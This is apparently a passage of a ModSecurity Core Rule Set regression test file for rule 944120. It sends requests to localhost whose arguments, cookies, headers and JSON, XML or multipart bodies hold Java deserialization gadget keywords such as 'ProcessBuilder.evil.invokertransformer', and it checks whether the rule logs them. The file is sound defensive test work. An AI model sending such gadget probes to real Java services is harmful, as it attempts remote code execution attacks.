+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.instantiatetransformer": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-65
+ desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.instantiatetransformer": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-66
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.instantiatetransformer
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-67
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.instantiatetransformer
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-68
+ desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.invokertransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-69
+ desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.invokertransformer=test"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-70
+ desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=ProcessBuilder.evil.invokertransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-71
+ desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: ProcessBuilder.evil.invokertransformer=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-72
+ desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.invokertransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-73
+ desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-74
+ desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-75
+ desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-76
+ desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.invokertransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-77
+ desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.invokertransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-78
+ desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.invokertransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-79
+ desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-80
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-81
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.invokertransformer": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-82
+ desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.invokertransformer": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-83
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type:
application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-86 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 
